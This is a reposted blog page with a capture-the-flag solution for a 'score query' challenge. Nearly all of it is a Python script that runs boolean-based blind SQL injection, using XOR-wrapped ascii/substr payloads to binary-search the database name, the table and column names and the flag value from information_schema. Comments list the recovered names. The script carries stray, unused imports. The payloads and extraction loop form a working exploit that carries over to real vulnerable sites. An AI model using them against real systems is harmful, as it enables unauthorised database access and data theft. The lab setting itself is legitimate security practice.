当前位置：网站首页>Bool blind note - score query

Bool blind note - score query

2022-07-03 19:39:00 【Forever culvert】

from aiohttp import Payload
from cherrypy import url
import requests
import time

from sympy import parallel_poly_from_expr

url = "http://0cfdc5c8-c87c-4e7f-b632-7f6c6ff7a2d0.node4.buuoj.cn:81/?stunum="

payload1 = "1^(ascii(substr((select(database())),{},1))>{})^1"
payload2 = "1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='ctf')),{},1))>{})^1"
payload3 = "1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='flag')),{},1))>{})^1"
payload4 = "1^(ascii(substr((select(group_concat(value))from(ctf.flag)),{},1))>{})^1"
database = ""

for x in range(1, 1000):
    low = 32
    high = 127
    mid = (low+high) // 2
    while low < high:
        playload = payload4.format(x, mid)
        new_url = url + playload
        r = requests.get(new_url)
        if "Hi admin, your score is: 100" in r.text:
            low = mid + 1
        else:
            high = mid
        mid = (low+high) // 2
    if (mid == 32 or mid == 132):
        break
    database += chr(mid)
    print(database)
    time.sleep(1)


print(database)
# ctf
# flag,score
# flag,value

原网站

版权声明
本文为[Forever culvert]所创，转载请带上原文链接，感谢
https://yzsam.com/2022/02/202202150127403693.html

当前位置：网站首页>Bool blind note - score query

Bool blind note - score query

边栏推荐

猜你喜欢

随机推荐